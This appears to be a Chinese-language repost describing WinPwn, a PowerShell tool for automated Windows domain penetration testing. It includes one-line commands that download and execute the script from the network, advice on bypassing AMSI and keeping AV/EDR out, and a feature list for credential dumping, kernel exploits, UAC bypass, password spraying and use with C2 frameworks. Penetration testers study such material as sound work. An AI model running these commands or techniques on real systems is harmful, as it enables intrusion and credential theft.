WinPwn-windows自动化域渗透测试工具

WinPwn-windows自动化域渗透测试工具

WinPwn简介

在过去的许多内部渗透测试中,由于缺少代理支持,我经常对现有的Powershell Recon / Exploitation脚本遇到问题。我还经常一个接一个地运行相同的脚本,以获取有关当前系统和/域的信息。为了自动化尽可能多的内部渗透测试流程(侦察和攻击),并且出于代理的原因,我编写了具有自动代理识别和集成功能的脚本。该脚本主要基于其他著名的大型进攻性安全性Powershell项目。

WinPwn使用方法

只需使用以下命令导入模块:

Import-Module .\WinPwn.ps1

或者

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

要绕过AMSI,请采用现有的绕过技术之一,找到AMSI触发器并在绕过函数中手动更改它或对触发器字符串进行编码。或者混淆整个脚本。

如果您使用的是ObfusWinPwn.ps1-它现在利用该项目的https://amsi.fail/通过Flangvik,我不是负责的代码托管在那里-但该项目是很酷,也让我在这里支持它。

要生成一个新的受保护的PowerShell进程,该进程将设置为与BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON进程缓解一起运行:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Obfus_SecurePS_WinPwn.ps1')

这样可以防止非Microsoft DLL(例如AV / EDR产品)加载到PowerShell中。

如果您发现自己被困在无法访问Internet的Windows系统上-完全没有问题,只需使用即可Offline_Winpwn.ps1,其中包括了最重要的脚本和可执行文件。

导入后可用的功能:

WinPwn-windows自动化域渗透测试工具
  • WinPwn ->菜单中选择攻击:
  • Inveigh ->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击
  • SessionGopher ->执行Sessiongopher询问您的参数
  • Kittielocal ->
    • 混淆的调用-Mimikatz版本
    • 内存中的Safetykatz
    • 使用rundll32技术转储lsass
    • 下载并运行混淆的Lazagne
    • 转储浏览器凭证
    • 定制的Mimikittenz版本
    • 窃取Wifi凭证
    • 转储SAM文件NTLM哈希
    • SharpCloud
  • Localreconmodules ->
    • 收集已安装的软件,易受攻击的软件,共享,网络信息,组,特权等等
    • 通过HTTP检查典型的漏洞,例如SMB签名,LLMNR中毒,MITM6,WSUS
    • 检查Powershell事件日志中的凭证或其他敏感信息
    • 收集浏览器凭证和历史记录
    • 在注册表和文件系统中搜索密码
    • 查找敏感文件(配置文件,RDP文件,Keepass数据库)
    • 在本地系统上搜索.NET Binaries
    • 可选:Get-Computerdetails(Powersploit)和PSRecon
  • Domainreconmodules ->
    • 收集各种域信息以进行手动检查
    • 在说明字段中找到广告密码
    • 搜索潜在的敏感域共享文件
    • 枚举不受约束的委派系统/用户
    • 生成猎犬报告
    • 适用于域系统的MS17-10扫描仪
    • 适用于域系统的Bluekeep扫描仪
    • SQL Server发现和审核功能-PowerUpSQL
    • MS-RPRN检查域控制器或所有系统
    • Grouper2的组策略审核
    • 使用ADRecon在CSV文件(如果已安装Excel,则为XLS)中生成AD报告。
    • 检查打印机的常见问题
    • 搜索基于资源的约束委派攻击路径
    • 检查所有DC零登录-CVE-2020-1472
    • 还有,只要看看
  • Privescmodules
    • itm4ns调用-PrivescCheck
    • winPEAS
    • Powersploits PowerUp Allchecks,Sherlock,GPPPasswords
    • DLL劫持,文件权限,注册表权限和弱键,烂/多汁土豆检查
  • kernelexploits ->
    • MS15-077-(XP / Vista / Win7 / Win8 / 2000/2003/2008/2012)仅x86!
    • MS16-032-(2008/7/8/10/2012)!
    • MS16-135-(仅WS2k16)!
    • CVE-2018-8120-2018年5月,Windows 7 SP1 / 2008 SP2,2008 R2 SP1!
    • CVE-2019-0841-2019年4月!
    • CVE-2019-1069-Polarbear硬链接,需要凭据-2019年6月!
    • CVE-2019-1129 / 1130-竞争状况,需要多个核心-2019年7月!
    • CVE-2019-1215-2019年9月-仅x64!
    • CVE-2020-0638-2020年2月-仅x64!
    • CVE-2020-0796-SMBGhost
    • CVE-2020-0787-2020年3月-所有Windows版本
    • 烂土豆利用
    • itm4ns喷淋剂
  • UACBypass ->
    • UAC Magic,基于James Forshaw在UAC上的三篇文章
    • UAC绕过cmstp技术,作者:Oddvar Moe
    • DiskCleanup UAC绕过,作者:James Forshaw
    • DccwBypassUAC技术,作者Ernesto Fernandez和Thomas Vanhoutte
  • SYSTEMShell ->
    • 使用CreateProcess弹出系统shell
    • 使用NamedPipe模拟模仿Pop System Shell
    • 使用令牌操作的Pop System Shell
    • 使用UsoClient DLL加载或CreateProcess绑定系统shel
  • Shareenumeration ->调用文件查找器和共享共享器(Powerview / Powersploit)
  • Domainshares ->在所有域系统上进行Snaffler或Passhunt搜索
  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping-查找您具有通过组策略映射(Powerview / Powersploit)进行管理员访问或RDP访问的系统
  • Kerberoasting ->在新窗口中执行Invoke-Kerberoast并存储哈希以供以后破解
  • PowerSQL -> SQL Server发现,检查当前用户的访问,审核默认凭据+ UNCPath注入攻击
  • Sharphound ->猎犬3.0报告
  • Adidnsmenu ->创建Active Directory集成的DNS节点或将其删除
  • MS17-10 ->扫描域或所有系统中的活动Windows Server是否存在MS17-10(Eternalblue)漏洞
  • Sharpcradle ->将C#文件从远程Web服务器加载到RAM
  • DomainPassSpray -> DomainPasswordSpray攻击,所有域用户一个密码
  • Bluekeep ->用于域系统的Bluekeep Scanner

没有参数,大多数功能只能在交互式shell中使用。因此,我决定添加参数-noninteractive-consoleoutput并使脚本可用于诸如Empire,Covenant,Cobalt Strike等异步C2-Framework。它们可以按如下方式使用:

用法:

-noninteractive->功能没有问题,因此它们可以使用预定义或用户定义的参数运行

-consoleoutput->战利品/报告文件夹未创建。每个函数都会将输出返回到控制台,以便您可以查看C2-Framework示例的代理日志中的所有内容:

WinPwn -noninteractive -consoleoutput -DomainRecon ->这将返回每个域侦查脚本和函数,并且可能会给您非常多的输出

WinPwn -noninteractive -consoleoutput -Localrecon ->这将枚举尽可能多的本地系统信息

Generalrecon -noninteractive ->执行基本的本地侦察功能,并将输出存储在相应的文件夹中

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp ->从低特权会话中以高完整性过程执行暂存器

Kittielocal -noninteractive -consoleoutput -browsercredentials ->通过Sharpweb转储浏览器凭据,将输出返回到控制台

Kittielocal -noninteractive -browsercredentials ->转储SAM文件NTLM哈希并将输出存储在文件中

WinPwn -PowerSharpPack -consoleoutput -noninteractive ->在内存中执行安全带,PowerUp,Watson和更多C#二进制文件

Dotnetsearch -consoleoutput -noninteractive ->搜索C:\Program Files\和搜索C:\Program Files (x86)\.NET程序集

项目地址:

GitHub:github.com/S3cur3Th1sSh1t/WinPwn

WinPwn下载地址

①GitHub: github.com/S3cur3Th1sSh1t/WinPwn/releases
②雨苁网盘: w.ddosi.workers.dev/github/WinPwn.rar
解压密码: www.ddosi.com

压缩包中两个文件:

WinPwn.exe 和 WinPwn.ps1 这两个文件可能会被杀毒软件报毒